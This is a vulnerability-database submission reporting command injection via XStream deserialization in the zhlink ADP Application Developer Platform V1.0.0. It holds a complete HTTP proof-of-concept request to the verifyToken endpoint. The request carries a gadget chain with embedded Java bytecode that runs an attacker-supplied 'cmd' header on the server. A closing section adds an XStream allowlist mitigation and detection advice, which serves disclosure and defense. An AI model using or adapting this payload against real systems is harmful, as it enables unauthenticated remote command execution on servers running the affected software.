Submit #581277: 智互联(深圳)科技有限公司 ADP Application Developer Platform (ADP应用开发者平台) zhlink V1.0.0 Command Injection

Title: 智互联(深圳)科技有限公司 ADP Application Developer Platform (ADP应用开发者平台) zhlink V1.0.0 Command Injection
Description:
Vulnerable URL: http://x.x.x.x:8082/adpweb/a/login
Root cause: an XStream deserialization vulnerability exists, which leads to command execution. The following POC can be used to test command execution:

POST /adpweb/wechat/verifyToken/ HTTP/1.1
Host: x.x.x.x:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Content-Type: text/xml
cmd: ipconfig
Content-Length: 7407

<java.util.PriorityQueue serialization="custom">
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class="org.apache.commons.beanutils.BeanComparator">
        <property>outputProperties</property>
        <comparator class="java.lang.String$CaseInsensitiveComparator"/>
      </comparator>
    </default>
    <int>3</int>
    <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom">
      <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
        <default>
          <__name>P</__name>
          <__bytecodes>
            <byte-array>yv66vgAAADEBCQEAH29yZy9hcGFjaGUvbG9nZ2luZy9mZS9GaWxlVXRpbHMHAAEBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwADAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBACFMb3JnL2FwYWNoZS9sb2dnaW5nL2ZlL0ZpbGVVdGlsczsMAAUABgoABAAMAQADcnVuDAAOAAYKAAIADwEAEGdldFJlcUhlYWRlck5hbWUBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAA2NtZAgAEwEAHmphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbgcAFQEAE2phdmEvbGFuZy9FeGNlcHRpb24HABcBABNqYXZhL2xhbmcvVGhyb3dhYmxlBwAZAQAFdmFyMTUBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEABXZhcjEzAQAFdmFyMTQBAAV2YXIxMgEACHJlc3BvbnNlAQASTGphdmEvbGFuZy9PYmplY3Q7AQAGd3JpdGVyAQAQTGphdmEvaW8vV3JpdGVyOwEABHZhcjcBABJMamF2YS9sYW5nL1N0cmluZzsBAAR2YXI2AQABSQEABHZhcjUBABVMamF2YS91dGlsL0FycmF5TGlzdDsBAAR2YXIzAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEABHZhcjQBAAR2YXIyAQAEdmFyMAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAEdmFyMQEAE1tMamF2YS9sYW5nL1RocmVhZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QHADIHADEBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAcANQEAEGphdmEvbGFuZy9PYmplY3QHADcBABNqYXZhL3V0aWwvQXJyYXlMaXN0BwA5AQAQamF2YS9sYW5nL1N0cmluZwcAOwEADVN0YWNrTWFwVGFibGUBABBqYXZhL2xhbmcvVGhyZWFkBwA+AQAKZ2V
0VGhyZWFkcwgAQAEAD2phdmEvbGFuZy9DbGFzcwcAQgEAEltMamF2YS9sYW5nL0NsYXNzOwcARAEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwwARgBHCgBDAEgBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgwASgBLCgAzAEwBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAE4ATwoAMwBQAQAHZ2V0TmFtZQwAUgASCgA/AFMBAARodHRwCABVAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoMAFcAWAoAPABZAQAIQWNjZXB0b3IIAFsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsMAF0AXgoAOABfAQAGdGFyZ2V0CABhAQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwwAYwBkCgBDAGUKADYATAEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DABoAGkKADYAagEACGVuZHBvaW50CABsAQAGdGhpcyQwCABuAQAHaGFuZGxlcggAcAEADWdldFN1cGVyY2xhc3MMAHIAXgoAQwBzAQAGZ2xvYmFsCAB1AQAOZ2V0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7DAB3AHgKAEMAeQEAIm9yZy5hcGFjaGUuY295b3RlLlJlcXVlc3RHcm91cEluZm8IAHsBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIHAH0BAAlsb2FkQ2xhc3MBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7DAB/AIAKAH4AgQoAQwBTAQAKcHJvY2Vzc29ycwgAhAEABHNpemUBAAMoKUkMAIYAhwoAOgCIAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7DABoAIoKADoAiwEAA3JlcQgAjQEAB2dldE5vdGUIAI8BABFqYXZhL2xhbmcvSW50ZWdlcgcAkQEABFRZUEUBABFMamF2YS9sYW5nL0NsYXNzOwwAkwCUCQCSAJUBAAd2YWx1ZU9mAQAWKEkpTGphdmEvbGFuZy9JbnRlZ2VyOwwAlwCYCgCSAJkBAAlnZXRIZWFkZXIIAJsBAAlnZXRNZXRob2QMAJ0ARwoAQwCeDAARABIKAAIAoAEAC2dldFJlc3BvbnNlCACiAQAJZ2V0V3JpdGVyCACkAQAOamF2YS9pby9Xcml0ZXIHAKYBAARleGVjAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsMAKgAqQoAAgCqAQAFd3JpdGUBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYMAKwArQoApwCuAQAFZmx1c2gMALAABgoApwCxAQAFY2xvc2UMALMABgoApwC0AQAHaXNMaW51eAEAAVoBAAZvc1R5cGUBAARjbWRzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAAmluAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQABcwEAE0xqYXZhL3V0aWwvU2Nhbm5lcjsBAAdleGVjUmVzAQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwcAugEAE2phdmEvaW8vSW5wdXRTdHJlYW0HAMMBABFqYXZhL3V0aWwvU2Nhbm5lcgcAxQEAB29zLm5hbWUIAMcBABBqYXZhL2xhbmcvU3lzdGVtBwDJAQALZ2V0UHJvcGVydHk
MAMsAqQoAygDMAQALdG9Mb3dlckNhc2UMAM4AEgoAPADPAQADd2luCADRAQAHL2Jpbi9zaAgA0wEAAi1jCADVAQAHY21kLmV4ZQgA1wEAAi9jCADZAQARamF2YS9sYW5nL1J1bnRpbWUHANsBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DADdAN4KANwA3wEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsMAKgA4QoA3ADiAQARamF2YS9sYW5nL1Byb2Nlc3MHAOQBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07DADmAOcKAOUA6AEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgwABQDqCgDGAOsBAAJcYQgA7QEADHVzZURlbGltaXRlcgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwwA7wDwCgDGAPEBAAAIAPMBAAdoYXNOZXh0AQADKClaDAD1APYKAMYA9wEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyBwD5CgD6AAwBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsMAPwA/QoA+gD+AQAEbmV4dAwBAAASCgDGAQEBAAh0b1N0cmluZwwBAwASCgD6AQQBAApnZXRNZXNzYWdlDAEGABIKABgBBwAhAAIABAAAAAAABAABAAUABgABAAcAAAA7AAEAAQAAAAkqtwANKrcAELEAAAACAAgAAAAOAAMAAAAMAAQADQAIAA4ACQAAAAwAAQAAAAkACgALAAAAAgARABIAAQAHAAAADwABAAEAAAADEhSwAAAAAAACAA4ABgABAAcAAASYAAYACwAAAkcSPxJBA70AQ8AARbYASUwrBLYATSsBA70AOLYAUcAANMAANMAANE0DPh0svqICFiwdMrYAVBJWtgBamQICLB0ytgBUEly2AFqZAfQsHTK2AGASYrYAZjoEGQQEtgBnGQQsHTK2AGs6BRkFtgBgEm22AGY6BKcAEToGGQW2AGASb7YAZjoEGQQEtgBnGQQZBbYAazoFGQW2AGAScbYAZjoEpwArOgYZBbYAYLYAdBJxtgBmOgSnABc6BxkFtgBgtgB0tgB0EnG2AGY6BBkEBLYAZxkEGQW2AGs6BRkFtgBgEna2AGY6BKcAFDoGGQW2AGC2AHQSdrYAZjoEGQQEtgBnGQQZBbYAazoFGQW2AGC2AHoSfLYAglcZBbYAYLYAgxJ8tgBamQEYGQW2AGAShbYAZjoEGQQEtgBnGQQZBbYAa8AAOjoGAzYHFQcZBrYAiaIA7RkGFQe2AIy2AGASjrYAZjoEGQQEtgBnGQQZBhUHtgCMtgBrtgBgEpAEvQBDWQOyAJZTtgBJGQQZBhUHtgCMtgBrBL0AOFkDBLgAmlO2AFE6BRkEGQYVB7YAjLYAa7YAYBKcBL0AQ1kDEjxTtgCfGQQZBhUHtgCMtgBrBL0AOFkDKrcAoVO2AFHAADw6CBkIxgBQGQW2AGASowO9AEO2AEkZBQO9ADi2AFE6CRkJtgBgEqUDvQBDtgCfGQkDvQA4tgBRwACnOgoZCioZCLcAq7YArxkKtgCyGQq2ALWnAA6nAAU6CYQHAaf/D4QDAaf96qcABEyxAAYAaAB0AHcAFgCUAKAAowAWAKUAtAC3ABYA2gDmAOkAFgGjAi4CNAAYAAACQgJFABoAAwAIAAAA1gA1AAAAGAAPABkAFAAaACcAGwAvABwASwAdAFgAHgBeAB8AaAAiAHQAJQB3ACMAeQAkAIUAJwCLACgAlAArAKAAMgCjACwApQAuALQAMQC3AC8AuQAwAMsANADRADUA2gA4AOYAOwDpADkA6wA6APoAPQEAAD4BCQA/ARcAQAEnAEEBMwB
CATkAQwFFAEUBUgBGAWMARwFpAEgBowBLAd8ATAHkAE0B/QBOAhkATwIkAFACKQBRAi4AUgIxAFUCNABUAjYARQI8ABsCQgBcAkUAWwJGAF4ACQAAAJgADwB5AAwAGwAcAAYAuQASAB0AHAAHAKUAJgAeABwABgDrAA8AHwAcAAYB/QA0ACAAIQAJAhkAGAAiACMACgHfAFUAJAAlAAgBSAD0ACYAJwAHAUUA9wAoACkABgBYAeQAKgArAAQAaAHUACwAIQAFACkCGQAtACcAAwAPAjMALgAvAAEAJwIbADAAMQACAAACRwAKAAsAAAA9AAAAlQAQ/gApBwAzBwA0Af8ATQAGBwACBwAzBwA0AQcANgcAOAABBwAWDV0HABb/ABMABwcAAgcAMwcANAEHADYHADgHABYAAQcAFvoAE10HABYQ/QBNBwA6AfwA6AcAPP8AAgAIBwACBwAzBwA0AQcANgcAOAcAOgEAAQcAGAH/AAUABAcAAgcAMwcANAEAAPgABUIHABoAAAIAqACpAAEABwAAAYkABAAIAAAAlQQ9Esi4AM1OLcYAES22ANAS0rYAWpkABQM9HJkAGAa9ADxZAxLUU1kEEtZTWQUrU6cAFQa9ADxZAxLYU1kEEtpTWQUrUzoEuADgGQS2AOO2AOk6BbsAxlkZBbcA7BLutgDyOgYS9DoHGQa2APiZAB+7APpZtwD7GQe2AP8ZBrYBArYA/7YBBToHp//fGQewTSy2AQiwAAEAAACOAI8AGAADAAgAAAA2AA0AAABjAAIAZAAIAGUAGABmABoAaQBHAGoAVABrAGQAbABoAG0AcABuAIwAcACPAHEAkAByAAkAAABcAAkAAgCNALYAtwACAAgAhwC4ACUAAwBHAEgAuQC6AAQAVAA7ALsAvAAFAGQAKwC9AL4ABgBoACcAvwAlAAcAkAAFAMAAwQACAAAAlQAKAAsAAAAAAJUAEwAlAAEAPQAAADwABv0AGgEHADwYUQcAwv8AIgAIBwACBwA8AQcAPAcAwgcAxAcAxgcAPAAAI/8AAgACBwACBwA8AAEHABgAAA==</byte-array>
          </__bytecodes>
          <__transletIndex>-1</__transletIndex>
          <__indentNumber>0</__indentNumber>
        </default>
        <boolean>false</boolean>
      </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
    </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
    <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>
Source: http://x.x.x.x:8099/adpweb/wechat/verifyToken/
User: Id3al (UID 85503)
Submission: 20.05.2025 02:55 (11 months ago)
Moderation: 29.05.2025 10:34 (9 days later)
Status: Accepted
VulDB Entry: 310496 [zhilink 智互联(深圳)科技有限公司 ADP Application Developer Platform 应用开发者平台 verifyToken privilege escalation]
Points: 20
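The root cause named in the submission is an XStream parser that instantiates whatever class name the untrusted text/xml body specifies, which is what lets a PriorityQueue/BeanComparator/TemplatesImpl chain reach the server. The following Java is an added example of the standard mitigation, not code from the submitter or from the vendor's product: an XStream instance configured with a strict type allowlist, so that a request body naming a JDK collection class is rejected by the SecurityMapper before any object is constructed. The VerifyTokenRequest DTO, the verifyToken alias and both sample documents are constructed for illustration and are not taken from the product. XStream 1.4.18 and later deny all types by default; the explicit permissions below also harden older releases.

```java
// Added example (not the submission's or the vendor's code): hardening an XStream
// instance that parses untrusted XML so that only the application's own DTO can be
// instantiated. The DTO, alias and sample bodies are assumptions for illustration.
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

public class SafeXStreamDemo {

    // Hypothetical request DTO for a verifyToken-style endpoint.
    public static class VerifyTokenRequest {
        public String token;
        public long timestamp;
    }

    // Builds an XStream instance that refuses every type not explicitly allowed.
    public static XStream hardenedXStream() {
        XStream xs = new XStream();
        // NoTypePermission.NONE drops all existing permissions: start from "deny all".
        xs.addPermission(NoTypePermission.NONE);
        // Re-add only what the endpoint genuinely needs.
        xs.addPermission(NullPermission.NULL);
        xs.addPermission(PrimitiveTypePermission.PRIMITIVES);
        xs.allowTypes(new Class[] { String.class, VerifyTokenRequest.class });
        // Map the root element to the DTO so callers never name a Java class in the XML.
        xs.alias("verifyToken", VerifyTokenRequest.class);
        return xs;
    }

    public static void main(String[] args) {
        XStream xs = hardenedXStream();

        // Constructed sample of a legitimate request body.
        String good = "<verifyToken><token>abc</token><timestamp>1716000000</timestamp></verifyToken>";
        VerifyTokenRequest req = (VerifyTokenRequest) xs.fromXML(good);
        System.out.println("token=" + req.token + " ts=" + req.timestamp);

        // Constructed sample whose root names a JDK collection class, the shape the
        // gadget chain in the submission starts from. The allowlist rejects the class
        // name itself, so no constructor, setter or comparator code ever runs.
        String hostile = "<java.util.PriorityQueue serialization=\"custom\"/>";
        try {
            xs.fromXML(hostile);
            System.out.println("UNEXPECTED: type was accepted");
        } catch (ForbiddenClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The same configuration belongs on every XStream instance that reads client-supplied data; a single unhardened instance elsewhere in the application leaves the chain reachable. On the detection side, the rejected request surfaces as a ForbiddenClassException, which is worth logging with the source address and the offending class name, since a PriorityQueue or TemplatesImpl root element in a login or token-verification request has no legitimate explanation.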
